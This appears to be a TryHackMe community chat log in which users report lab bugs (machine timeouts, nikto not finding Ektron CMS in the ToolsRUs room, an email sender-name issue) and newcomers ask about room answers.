Hi, just for improvement purpose, it is painful to relaunch an attacked computer and go for the same actions just because of focusing on other pages

@karmic cypress What do you mean by that last bit?

When a room expires?

Not really, after an half day on thm, my guess is that after a certain time without interacting with the box, it terminates automatically

Boxes terminate 1 hour after you click deploy. @karmic cypress

You can extend it with the extend button.

Extends by 1 hour, but you can only extend it when it has less than an hour left

Timezone detection is currently a little broken, but this is being changed to a countdown soon

@spiral flame I noticed that . If I open tryhackme from my physical machine , it detects the time zone correctly

If I open it from my own Kali Vm, the time zone looks out of wack, like early morning or 12 hrs before

@karmic cypress I’m having the same problem. The VM terminates itself for no reason. But I haven’t clock it , I will tomorrow . If it terminates after an hour and that’s normal that may explain , if not , I think there’s a bug

That's because the Kali vm isn't synced to your timezone I believe

Fortunately

Actually, I thought the same but it’s set to central time , I’m in Texas

This bug is now irrelevant as the timezone countdown has been replaced with a regular countdown :)

Ok

What about the machine dying itself ?

So nothing is linked to your timezones

That's not a bug

Thm does that for every machine

You can keep extending it as needed though

Ok, so what’s the max time ? 1 hr ?

Yea

Ohh ok, I’ll check tomorrow and see if is stable

And you can keep extending as needed

I thought it was more , I was using the deadline and it says was gonna expire tomorrow morning and all of the sudden died on me

But that was hours ago

Yep now that we have a countdown

You don't have to worry about timezone shenanigans

Yep, I see a countdown now

Cool. I’ll check tomorrow then, thanks for the update

Np :)

Good night (or good day , not sure where you are )

😃

ToolRus Room: Tasks #8 Kali and macOS, nikto can't find the Ektron CMS version information. (macOS take more than 1 hours with nothing in return). Please check the room again.

Also, I exploit tomcat_mgr_uploads and try to find on the VMs, but It doesn't have find or locate command. So worthless trying.

Minor, email sender isn't TryHackMe for subscription cancellation emails

Who is it?

All emails use the same function, from the same sender

It's from hello@tryhackme.com for me

Same as all the others

But I think what JKR is saying is the sender field says "hello" rather than "TryHackMe"

aye jkr isn't dead

But I think what JKR is saying is the sender field says "hello" rather than "TryHackMe"
@spiral flame Ah right, yeah thats weird because AWS SES should send it from the same email/sender

I get them all from "hello"

Same

That's what's being said

But I think what JKR is saying is the sender field says "hello" rather than "TryHackMe"
@spiral flame ah yee

Yeah yeah

I get ya

❤️

<TryHackMe>

Minor, email sender isn't TryHackMe for subscription cancellation emails
@mortal root

Will go be made live tomorrow - Thanks for letting me know

aye jkr isn't dead
@worthy stag You can blame a dissertation and finding post-uni apartments for that one :p

nvmmmmmm

Uhm. For the room RP: Web Scanning --> Task 3, Question 8 --> OWASP does not report that anymore. Maybe it has something to do with the version.

And in ToolsRUS, Nikto does not find Ektron anymore. I've tried it on 3 machines, ran nikto with -id, as in the writeup.

Can't speak for the first one @feral echo, but the second one is a known bug. I think fixing it is on the To-Do list. In the meantime, if you DM me with the command you used, I'll check it. If it looks like it should give you the answer, I'll tell it to you.

Hey hello

can anyine help me please

I am new to tryandhackme how to setup for free

@left fossil #site-support

i am currently trying to the cruck the hash box. When, i am trying to break the bcrypt hash with john the ripper it says that the estimated completion time is in one monthe! (note that i am using john inside a vm). Anyone knows a faster approach?

Yes

It's a 4 character password

Use hashcat incremental with 4 lowercase characters

Bcrypt is designed to be hard to break

Hey guys I am learning nmap scanning Do I have to perform these scan on tryhackme.com site.

@loud folio #room-help @left fossil and you

These aren't bugs

Use the right channel please

anyone knows the format of input in blue machine number of ports open i found the ports but its not excepting the input

can anyone help?

@silent turtle #room-help

anyone knows the format of input in blue machine number of ports open i found the ports but its not excepting the input
@silent turtle I believe it said ports under 1000

@feral echo they are 135,139,445 and udpports are 123,137,138and 500 but it shows its incorrect

Try entering the tcp only

@feral echo only tcp ports are 135,139 and 145 but its showing incorrect to that too

... enter the number of them... :) How many are there, in total? A single digit.

@feral echo lol i was dumb thanks a lot

@feral echo do we have to find all port vunerablility or just those three port that we mentioned sorry for bothering a lot its my first machine here.

@silent turtle #room-help

It's a walkthrough. Follow it.

okay thanks